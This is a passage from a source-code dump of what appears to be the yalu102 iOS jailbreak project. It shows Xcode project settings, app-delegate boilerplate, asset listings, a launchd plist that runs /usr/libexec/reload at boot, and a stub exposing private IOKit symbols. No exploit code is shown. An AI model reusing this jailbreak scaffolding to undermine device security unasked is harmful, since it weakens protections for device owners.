isa = XCConfigurationList; 377 | buildConfigurations = ( 378 | EA9900F81E1E9F060056FEBD /* Debug */, 379 | EA9900F91E1E9F060056FEBD /* Release */, 380 | ); 381 | defaultConfigurationIsVisible = 0; 382 | defaultConfigurationName = Release; 383 | }; 384 | EA9900FA1E1E9F060056FEBD /* Build configuration list for PBXNativeTarget "yalu102" */ = { 385 | isa = XCConfigurationList; 386 | buildConfigurations = ( 387 | EA9900FB1E1E9F060056FEBD /* Debug */, 388 | EA9900FC1E1E9F060056FEBD /* Release */, 389 | ); 390 | defaultConfigurationIsVisible = 0; 391 | defaultConfigurationName = Release; 392 | }; 393 | /* End XCConfigurationList section */ 394 | }; 395 | rootObject = EA9900DB1E1E9F060056FEBD /* Project object */; 396 | } 397 | -------------------------------------------------------------------------------- /yalu102.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /yalu102/0.reload.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | 0.reload 7 | ProgramArguments 8 | 9 | /usr/libexec/reload 10 | 11 | RunAtLoad 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /yalu102/AppDelegate.h: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.h 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import 10 | 11 | @interface AppDelegate : UIResponder 12 | 13 | @property (strong, nonatomic) UIWindow *window; 14 | 15 | 16 | @end 17 | 18 | -------------------------------------------------------------------------------- /yalu102/AppDelegate.m: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.m 3 | // yalu102 4 | // 5 | // Created by qwertyoruiop on 05/01/2017. 6 | // Copyright © 2017 kimjongcracks. All rights reserved. 7 | // 8 | 9 | #import "AppDelegate.h" 10 | 11 | @interface AppDelegate () 12 | 13 | @end 14 | 15 | @implementation AppDelegate 16 | 17 | 18 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions { 19 | // Override point for customization after application launch. 20 | return YES; 21 | } 22 | 23 | 24 | - (void)applicationWillResignActive:(UIApplication *)application { 25 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 26 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 27 | } 28 | 29 | 30 | - (void)applicationDidEnterBackground:(UIApplication *)application { 31 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 32 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 33 | } 34 | 35 | 36 | - (void)applicationWillEnterForeground:(UIApplication *)application { 37 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 38 | } 39 | 40 | 41 | - (void)applicationDidBecomeActive:(UIApplication *)application { 42 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 43 | } 44 | 45 | 46 | - (void)applicationWillTerminate:(UIApplication *)application { 47 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 48 | } 49 | 50 | 51 | @end 52 | -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadnotif.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptl3.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@2x~ipadsptlsmal.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40@3x~iphone.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-1.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad-2.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon40x40~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@2x~ipadpro.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60@3x.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kpwn/yalu102/11ed504bad945f95b4372469dcf9e7e43a938aac/yalu102/Assets.xcassets/AppIcon.appiconset/AppIcon60x60~ipad.png -------------------------------------------------------------------------------- /yalu102/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "size" : "20x20", 5 | "idiom" : "iphone", 6 | "filename" : "AppIcon40x40~ipad-2.png", 7 | "scale" : "2x" 8 | }, 9 | { 10 | "size" : "20x20", 11 | "idiom" : "iphone", 12 | "filename" : "AppIcon60x60.png", 13 | "scale" : "3x" 14 | }, 15 | { 16 | "size" : "29x29", 17 | "idiom" : "iphone", 18 | "filename" : "AppIcon40x40@2x~ipadsptl.png", 19 | "scale" : "2x" 20 | }, 21 | { 22 | "size" : "29x29", 23 | "idiom" : "iphone", 24 | "filename" : "AppIcon40x40@2x~ipadsptl3.png", 25 | "scale" : "3x" 26 | }, 27 | { 28 | "size" : "40x40", 29 | "idiom" : "iphone", 30 | "filename" : "AppIcon40x40@2x~ipad-1.png", 31 | "scale" : "2x" 32 | }, 33 | { 34 | "size" : "40x40", 35 | "idiom" : "iphone", 36 | "filename" : "AppIcon40x40@3x~iphone.png", 37 | "scale" : "3x" 38 | }, 39 | { 40 | "size" : "60x60", 41 | "idiom" : "iphone", 42 | "filename" : "AppIcon60x60@2x.png", 43 | "scale" : "2x" 44 | }, 45 | { 46 | "size" : "60x60", 47 | "idiom" : "iphone", 48 | "filename" : "AppIcon60x60@3x.png", 49 | "scale" : "3x" 50 | }, 51 | { 52 | "size" : "20x20", 53 | "idiom" : "ipad", 54 | "filename" : "AppIcon40x40@2x~ipadnotif.png", 55 | "scale" : "1x" 56 | }, 57 | { 58 | "size" : "20x20", 59 | "idiom" : "ipad", 60 | "filename" : "AppIcon40x40~ipad-1.png", 61 | "scale" : "2x" 62 | }, 63 | { 64 | "size" : "29x29", 65 | "idiom" : "ipad", 66 | "filename" : "AppIcon40x40@2x~ipadsptlsmal.png", 67 | "scale" : "1x" 68 | }, 69 | { 70 | "size" : "29x29", 71 | "idiom" : "ipad", 72 | "filename" : "AppIcon40x40@2x~ipadsptl-1.png", 73 | "scale" : "2x" 74 | }, 75 | { 76 | "size" : "40x40", 77 | "idiom" : "ipad", 78 | "filename" : "AppIcon40x40~ipad.png", 79 | "scale" : "1x" 80 | }, 81 | { 82 | "size" : "40x40", 83 | "idiom" : "ipad", 84 | "filename" : "AppIcon40x40@2x~ipad.png", 85 | "scale" : "2x" 86 | }, 87 | { 88 | "size" : "76x76", 89 | "idiom" : "ipad", 90 | "filename" : "AppIcon60x60~ipad.png", 91 | "scale" : "1x" 92 | }, 93 | { 94 | "size" : "76x76", 95 | "idiom" : "ipad", 96 | "filename" : "AppIcon60x60@2x~ipad.png", 97 | "scale" : "2x" 98 | }, 99 | { 100 | "size" : "83.5x83.5", 101 | "idiom" : "ipad", 102 | "filename" : "AppIcon60x60@2x~ipadpro.png", 103 | "scale" : "2x" 104 | } 105 | ], 106 | "info" : { 107 | "version" : 1, 108 | "author" : "xcode" 109 | } 110 | } -------------------------------------------------------------------------------- /yalu102/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /yalu102/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 33 | 39 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | -------------------------------------------------------------------------------- /yalu102/IOKit.tbd: -------------------------------------------------------------------------------- 1 | --- 2 | archs: [ armv7, armv7s, arm64, armv7k ] 3 | platform: ios 4 | install-name: /System/Library/Frameworks/IOKit.framework/Versions/A/IOKit 5 | current-version: 275.0 6 | exports: 7 | - archs: [ armv7, armv7s, armv7k ] 8 | symbols: [ _IOConnectMethodScalarIScalarO, _IOConnectMethodScalarIStructureI, 9 | _IOConnectMethodScalarIStructureO, _IOConnectMethodStructureIStructureO, 10 | _IOMapMemory, _io_async_method_scalarI_scalarO, 11 | _io_async_method_scalarI_structureI, _io_async_method_scalarI_structureO, 12 | _io_async_method_structureI_structureO, _io_catalog_get_data, 13 | _io_catalog_get_gen_count, _io_catalog_module_loaded, 14 | _io_catalog_reset, _io_catalog_send_data, _io_catalog_terminate, 15 | _io_connect_add_client, _io_connect_async_method, 16 | _io_connect_get_notification_semaphore, _io_connect_get_service, 17 | _io_connect_map_memory, _io_connect_map_memory_into_task, 18 | _io_connect_method, _io_connect_method_scalarI_scalarO, 19 | _io_connect_method_scalarI_structureI, _io_connect_method_scalarI_structureO, 20 | _io_connect_method_structureI_structureO, _io_connect_method_var_output, 21 | _io_connect_set_notification_port, _io_connect_set_properties, 22 | _io_connect_unmap_memory, _io_connect_unmap_memory_from_task, 23 | _io_iterator_is_valid, _io_iterator_next, _io_iterator_reset, 24 | _io_object_conforms_to, _io_object_get_bundle_identifier, 25 | _io_object_get_class, _io_object_get_retain_count, 26 | _io_object_get_superclass, _io_registry_create_iterator, 27 | _io_registry_entry_create_iterator, _io_registry_entry_from_path, 28 | _io_registry_entry_from_path_ool, _io_registry_entry_get_child_iterator, 29 | _io_registry_entry_get_location_in_plane, _io_registry_entry_get_name, 30 | _io_registry_entry_get_name_in_plane, _io_registry_entry_get_parent_iterator, 31 | _io_registry_entry_get_path, _io_registry_entry_get_path_ool, 32 | _io_registry_entry_get_properties, _io_registry_entry_get_properties_bin, 33 | _io_registry_entry_get_property, _io_registry_entry_get_property_bin, 34 | _io_registry_entry_get_property_bytes, _io_registry_entry_get_property_recursively, 35 | _io_registry_entry_get_registry_entry_id, _io_registry_entry_in_plane, 36 | _io_registry_entry_set_properties, _io_registry_get_root_entry, 37 | _io_registry_iterator_enter_entry, _io_registry_iterator_exit_entry, 38 | _io_server_version, _io_service_acknowledge_notification, 39 | _io_service_add_interest_notification, _io_service_add_notification, 40 | _io_service_add_notification_bin, _io_service_add_notification_ool, 41 | _io_service_close, _io_service_get_authorization_id, 42 | _io_service_get_busy_state, _io_service_get_matching_service, 43 | _io_service_get_matching_service_bin, _io_service_get_matching_service_ool, 44 | _io_service_get_matching_services, _io_service_get_matching_services_bin, 45 | _io_service_get_matching_services_ool, _io_service_get_state, 46 | _io_service_match_property_table, _io_service_match_property_table_bin, 47 | _io_service_match_property_table_ool, _io_service_open_extended, 48 | _io_service_request_probe, _io_service_set_authorization_id, 49 | _io_service_wait_quiet ] 50 | - archs: [ armv7, armv7s, arm64, armv7k ] 51 | symbols: [ _IOAVAudioFormatTypeString, _IOAVAudioGetChannelAllocation, 52 | _IOAVAudioGetChannelAllocationDefault, _IOAVAudioGetChannelLayoutData, 53 | _IOAVAudioGetSpeakerAllocationMask, _IOAVAudioInterfaceCopyChannelLayoutElements, 54 | _IOAVAudioInterfaceCopyDiagnosticsString, _IOAVAudioInterfaceCopyElements, 55 | _IOAVAudioInterfaceCopyProperties, _IOAVAudioInterfaceCopyProperty, 56 | _IOAVAudioInterfaceCreate, _IOAVAudioInterfaceCreateWithService, 57 | _IOAVAudioInterfaceGetLinkData, _IOAVAudioInterfaceGetLinkDataWithSource, 58 | _IOAVAudioInterfaceGetService, _IOAVAudioInterfaceGetTypeID, 59 | _IOAVAudioInterfaceSetLogLevel, _IOAVAudioInterfaceSetLogLevelMask, 60 | _IOAVAudioInterfaceSetProperty, _IOAVAudioInterfaceStartLink, 61 | _IOAVAudioInterfaceStartLinkWithSource, _IOAVAudioInterfaceStopLink, 62 | _IOAVAudioInterfaceStopLinkWithSource, _IOAVAudioSampleRate, 63 | _IOAVAudioSampleRateScalar, _IOAVAudioSampleSize, 64 | _IOAVAudioSpeakerString, _IOAVCommandString, _IOAVControlInterfaceCopyDiagnosticsString, 65 | _IOAVControlInterfaceCopyProperties, _IOAVControlInterfaceCopyProperty, 66 | _IOAVControlInterfaceCreate, _IOAVControlInterfaceCreateWithService, 67 | _IOAVControlInterfaceGetService, _IOAVControlInterfaceGetTypeID, 68 | _IOAVControlInterfaceSetLogLevel, _IOAVControlInterfaceSetLogLevelMask, 69 | _IOAVControlInterfaceSetProperty, _IOAVControllerClearEventLog, 70 | _IOAVControllerCopyDiagnosticsString, _IOAVControllerCopyProperties, 71 | _IOAVControllerCopyProperty, _IOAVControllerCreate, 72 | _IOAVControllerCreateWithLocation, _IOAVControllerCreateWithService, 73 | _IOAVControllerForceHotPlugDetect, _IOAVControllerGetLocation, 74 | _IOAVControllerGetPower, _IOAVControllerGetTypeID, 75 | _IOAVControllerSetEventLogCommandMask, _IOAVControllerSetEventLogEventMask, 76 | _IOAVControllerSetEventLogSize, _IOAVControllerSetLogLevel, 77 | _IOAVControllerSetLogLevelMask, _IOAVControllerSetPower, 78 | _IOAVControllerSetProperty, _IOAVControllerSetProtectionType, 79 | _IOAVControllerSetQualityPattern, _IOAVCreateDiagnosticsReference, 80 | _IOAVCreateDiagnosticsReferenceWithLocation, _IOAVCreateDiagnosticsString, 81 | _IOAVCreateDiagnosticsStringWithLocation, _IOAVCreateStringWithAudioChannelLayoutData, 82 | _IOAVCreateStringWithAudioLinkData, _IOAVCreateStringWithData, 83 | _IOAVCreateStringWithElement, _IOAVCreateStringWithElements, 84 | _IOAVCreateStringWithVideoColorData, _IOAVCreateStringWithVideoLinkData, 85 | _IOAVCreateStringWithVideoTimingData, _IOAVDeviceClearEventLog, 86 | _IOAVDeviceCopyDiagnosticsString, _IOAVDeviceCopyProperties, 87 | _IOAVDeviceCopyProperty, _IOAVDeviceCreate, _IOAVDeviceCreateWithLocation, 88 | _IOAVDeviceCreateWithService, _IOAVDeviceGetController, 89 | _IOAVDeviceGetLinkData, _IOAVDeviceGetLocation, 90 | _IOAVDeviceGetPower, _IOAVDeviceGetProtectionStatus, 91 | _IOAVDeviceGetProtectionType, _IOAVDeviceGetTypeID, 92 | _IOAVDeviceReadI2C, _IOAVDeviceSetEventLogCommandMask, 93 | _IOAVDeviceSetEventLogEventMask, _IOAVDeviceSetEventLogSize, 94 | _IOAVDeviceSetLogLevel, _IOAVDeviceSetLogLevelMask, 95 | _IOAVDeviceSetPower, _IOAVDeviceSetProperty, _IOAVDeviceStartLink, 96 | _IOAVDeviceStopLink, _IOAVDeviceWriteI2C, _IOAVEDIDIsStandard, 97 | _IOAVElementTypeString, _IOAVEventLogEventTypeString, 98 | _IOAVGetCEAVideoShortID, _IOAVGetCEAVideoShortIDWithData, 99 | _IOAVGetCEAVideoShortIDWithDataActive, _IOAVGetCEAVideoTimingData, 100 | _IOAVGetCEAVideoTimingDataWithShortID, _IOAVGetCVTVideoTimingData, 101 | _IOAVGetDMTVideoTimingData, _IOAVGetGTFVideoTimingData, 102 | _IOAVGetSPDInfoFrame, _IOAVGetSupportedVideoTimingDataList, 103 | _IOAVGetTransportSupportsCEA, _IOAVGetTransportSupportsYCbCr, 104 | _IOAVGetVideoTimingData, _IOAVGetVideoTimingITSource, 105 | _IOAVHDMIAudioClockRegenerationDataForLink, _IOAVInfoFrameGetChecksum, 106 | _IOAVInfoFrameTypeString, _IOAVLinkSourceString, 107 | _IOAVLinkTypeString, _IOAVLocationString, _IOAVProtectionStatusString, 108 | _IOAVProtectionTypeString, _IOAVRecoverableError, 109 | _IOAVServiceClearEventLog, _IOAVServiceCopyDiagnosticsString, 110 | _IOAVServiceCopyEDID, _IOAVServiceCopyProperties, 111 | _IOAVServiceCopyProperty, _IOAVServiceCreate, _IOAVServiceCreateWithLocation, 112 | _IOAVServiceCreateWithService, _IOAVServiceGetDevice, 113 | _IOAVServiceGetLinkData, _IOAVServiceGetLinkDataWithSource, 114 | _IOAVServiceGetPower, _IOAVServiceGetProtectionStatus, 115 | _IOAVServiceGetProtectionType, _IOAVServiceGetTypeID, 116 | _IOAVServiceSetEventLogCommandMask, _IOAVServiceSetEventLogEventMask, 117 | _IOAVServiceSetEventLogSize, _IOAVServiceSetLogLevel, 118 | _IOAVServiceSetLogLevelMask, _IOAVServiceSetPower, 119 | _IOAVServiceSetProperty, _IOAVServiceSetVirtualEDIDMode, 120 | _IOAVServiceStartInfoFrame, _IOAVServiceStartInfoFrameWithSource, 121 | _IOAVServiceStartLink, _IOAVServiceStartLinkWithSource, 122 | _IOAVServiceStopInfoFrame, _IOAVServiceStopInfoFrameWithSource, 123 | _IOAVServiceStopLink, _IOAVServiceStopLinkWithSource, 124 | _IOAVServiceSupportsLink, _IOAVStandardTypeString, 125 | _IOAVSupportedVideoTimingDataListTypeString, _IOAVTransportString, 126 | _IOAVVideoActiveFormatAspectRatio, _IOAVVideoAxisString, 127 | _IOAVVideoColorBitDepth, _IOAVVideoColorBitDepthScalar, 128 | _IOAVVideoColorCoefficientString, _IOAVVideoColorDynamicRangeString, 129 | _IOAVVideoColorSpaceString, _IOAVVideoGetPixelClockTolerance, 130 | _IOAVVideoInterfaceCopyColorElements, _IOAVVideoInterfaceCopyDiagnosticsString, 131 | _IOAVVideoInterfaceCopyProperties, _IOAVVideoInterfaceCopyProperty, 132 | _IOAVVideoInterfaceCopyTimingElements, _IOAVVideoInterfaceCreate, 133 | _IOAVVideoInterfaceCreateWithLocation, _IOAVVideoInterfaceCreateWithService, 134 | _IOAVVideoInterfaceGetLinkData, _IOAVVideoInterfaceGetLinkDataWithSource, 135 | _IOAVVideoInterfaceGetService, _IOAVVideoInterfaceGetTypeID, 136 | _IOAVVideoInterfaceSetBounds, _IOAVVideoInterfaceSetColorDitherRemoval, 137 | _IOAVVideoInterfaceSetLogLevel, _IOAVVideoInterfaceSetLogLevelMask, 138 | _IOAVVideoInterfaceSetProperty, _IOAVVideoInterfaceSetRotation, 139 | _IOAVVideoInterfaceStartLink, _IOAVVideoInterfaceStartLinkWithSource, 140 | _IOAVVideoInterfaceStopLink, _IOAVVideoInterfaceStopLinkWithSource, 141 | _IOAVVideoLinkModeString, _IOAVVideoTimingCalculatedTypeString, 142 | _IOAVVideoTimingGetActivePixelClock, _IOAVVideoTimingGetPixelClock, 143 | _IOAVVideoTimingGetSyncRateRounded, _IOAVVideoTimingTypeString, 144 | _IOAllowPowerChange, _IOBSDNameMatching, _IOCFSerialize, 145 | _IOCFURLWriteDataAndPropertiesToResource, _IOCFUnserialize, 146 | _IOCFUnserializeBinary, _IOCFUnserializeWithSize, 147 | _IOCFUnserializeparse, _IOCancelPowerChange, _IOCatalogueGetData, 148 | _IOCatalogueModuleLoaded, _IOCatalogueReset, _IOCatalogueSendData, 149 | _IOCatalogueTerminate, _IOCatlogueGetGenCount, _IOCloseConnection, 150 | _IOCompatibiltyNumber, _IOConnectAddClient, _IOConnectAddRef, 151 | _IOConnectCallAsyncMethod, _IOConnectCallAsyncScalarMethod, 152 | _IOConnectCallAsyncStructMethod, _IOConnectCallMethod, 153 | _IOConnectCallScalarMethod, _IOConnectCallStructMethod, 154 | _IOConnectGetService, _IOConnectMapMemory, _IOConnectMapMemory64, 155 | _IOConnectRelease, _IOConnectSetCFProperties, _IOConnectSetCFProperty, 156 | _IOConnectSetNotificationPort, _IOConnectTrap0, 157 | _IOConnectTrap1, _IOConnectTrap2, _IOConnectTrap3, 158 | _IOConnectTrap4, _IOConnectTrap5, _IOConnectTrap6, 159 | _IOConnectUnmapMemory, _IOConnectUnmapMemory64, 160 | _IOCopySystemLoadAdvisoryDetailed, _IOCreatePlugInInterfaceForService, 161 | _IOCreateReceivePort, _IODPCalculateM, _IODPCommandString, 162 | _IODPCompareLinkTrainingData, _IODPControllerCreate, 163 | _IODPControllerCreateWithLocation, _IODPControllerCreateWithService, 164 | _IODPControllerGetAVController, _IODPControllerGetMaxLaneCount, 165 | _IODPControllerGetMaxLinkRate, _IODPControllerGetMinLaneCount, 166 | _IODPControllerGetMinLinkRate, _IODPControllerGetTypeID, 167 | _IODPControllerSetDownspreadModulationFrequency, 168 | _IODPControllerSetDriveSettings, _IODPControllerSetLaneCount, 169 | _IODPControllerSetLinkRate, _IODPControllerSetMaxLaneCount, 170 | _IODPControllerSetMaxLinkRate, _IODPControllerSetMinLaneCount, 171 | _IODPControllerSetMinLinkRate, _IODPControllerSetSupportsALPM, 172 | _IODPControllerSetSupportsDownspread, _IODPControllerSetSupportsEnhancedMode, 173 | _IODPControllerSetSupportsScrambling, _IODPCreateStringWithLinkTrainingData, 174 | _IODPDeviceCreate, _IODPDeviceCreateWithLocation, 175 | _IODPDeviceCreateWithService, _IODPDeviceGetAVDevice, 176 | _IODPDeviceGetController, _IODPDeviceGetLinkTrainingData, 177 | _IODPDeviceGetMaxLaneCount, _IODPDeviceGetMaxLinkRate, 178 | _IODPDeviceGetRevisionMajor, _IODPDeviceGetRevisionMinor, 179 | _IODPDeviceGetSinkCount, _IODPDeviceGetSupportsDownspread, 180 | _IODPDeviceGetSupportsEnhancedMode, _IODPDeviceGetSymbolErrorCount, 181 | _IODPDeviceGetTypeID, _IODPDeviceReadDPCD, _IODPDeviceSetALPMEnabled, 182 | _IODPDeviceTypeString, _IODPDeviceWriteDPCD, _IODPDriveSettingsAreValid, 183 | _IODPEventLogEventTypeString, _IODPLinkMaxPixelRate, 184 | _IODPLinkRateEnum, _IODPLinkRateIsStandard, _IODPLinkRateScalar, 185 | _IODPLinkSymbolRate, _IODPServiceCreate, _IODPServiceCreateWithLocation, 186 | _IODPServiceCreateWithService, _IODPServiceGetAVService, 187 | _IODPServiceGetDevice, _IODPServiceGetSinkCount, 188 | _IODPServiceGetSymbolErrorCount, _IODPServiceGetTypeID, 189 | _IODPServiceRetrainLink, _IODPServiceSetLinkCheckEnable, 190 | _IODPStreamClockHz, _IODPTrainingPatternLength, 191 | _IODPVideoMinLinkRate, _IODataQueueAllocateNotificationPort, 192 | _IODataQueueDataAvailable, _IODataQueueDequeue, 193 | _IODataQueueEnqueue, _IODataQueuePeek, _IODataQueueSetNotificationPort, 194 | _IODataQueueWaitForAvailableData, _IODeregisterApp, 195 | _IODeregisterForSystemPower, _IODestroyPlugInInterface, 196 | _IODispatchCalloutFromCFMessage, _IODispatchCalloutFromMessage, 197 | _IOEthernetControllerCreate, _IOEthernetControllerGetBSDSocket, 198 | _IOEthernetControllerGetIONetworkInterfaceObject, 199 | _IOEthernetControllerGetTypeID, _IOEthernetControllerReadPacket, 200 | _IOEthernetControllerRegisterBSDAttachCallback, 201 | _IOEthernetControllerRegisterDisableCallback, _IOEthernetControllerRegisterEnableCallback, 202 | _IOEthernetControllerRegisterPacketAvailableCallback, 203 | _IOEthernetControllerScheduleWithRunLoop, _IOEthernetControllerSetDispatchQueue, 204 | _IOEthernetControllerSetLinkStatus, _IOEthernetControllerSetPowerSavings, 205 | _IOEthernetControllerUnscheduleFromRunLoop, _IOEthernetControllerWritePacket, 206 | _IOGetSystemLoadAdvisory, _IOHIDCopyCFTypeParameter, 207 | _IOHIDCreateSharedMemory, _IOHIDDeviceClose, _IOHIDDeviceConformsTo, 208 | _IOHIDDeviceCopyMatchingElements, _IOHIDDeviceCopyValueMultiple, 209 | _IOHIDDeviceCopyValueMultipleWithCallback, _IOHIDDeviceCreate, 210 | _IOHIDDeviceGetProperty, _IOHIDDeviceGetReport, 211 | _IOHIDDeviceGetReportWithCallback, _IOHIDDeviceGetService, 212 | _IOHIDDeviceGetTypeID, _IOHIDDeviceGetValue, _IOHIDDeviceGetValueWithCallback, 213 | _IOHIDDeviceOpen, _IOHIDDeviceRegisterInputReportCallback, 214 | _IOHIDDeviceRegisterInputReportWithTimeStampCallback, 215 | _IOHIDDeviceRegisterInputValueCallback, _IOHIDDeviceRegisterRemovalCallback, 216 | _IOHIDDeviceScheduleWithRunLoop, _IOHIDDeviceSetInputValueMatching, 217 | _IOHIDDeviceSetInputValueMatchingMultiple, _IOHIDDeviceSetProperty, 218 | _IOHIDDeviceSetReport, _IOHIDDeviceSetReportWithCallback, 219 | _IOHIDDeviceSetValue, _IOHIDDeviceSetValueMultiple, 220 | _IOHIDDeviceSetValueMultipleWithCallback, _IOHIDDeviceSetValueWithCallback, 221 | _IOHIDDeviceUnscheduleFromRunLoop, _IOHIDElementAttach, 222 | _IOHIDElementCopyAttached, _IOHIDElementCreateWithDictionary, 223 | _IOHIDElementDetach, _IOHIDElementGetChildren, _IOHIDElementGetCollectionType, 224 | _IOHIDElementGetCookie, _IOHIDElementGetDevice, 225 | _IOHIDElementGetDuplicateIndex, _IOHIDElementGetLogicalMax, 226 | _IOHIDElementGetLogicalMin, _IOHIDElementGetName, 227 | _IOHIDElementGetParent, _IOHIDElementGetPhysicalMax, 228 | 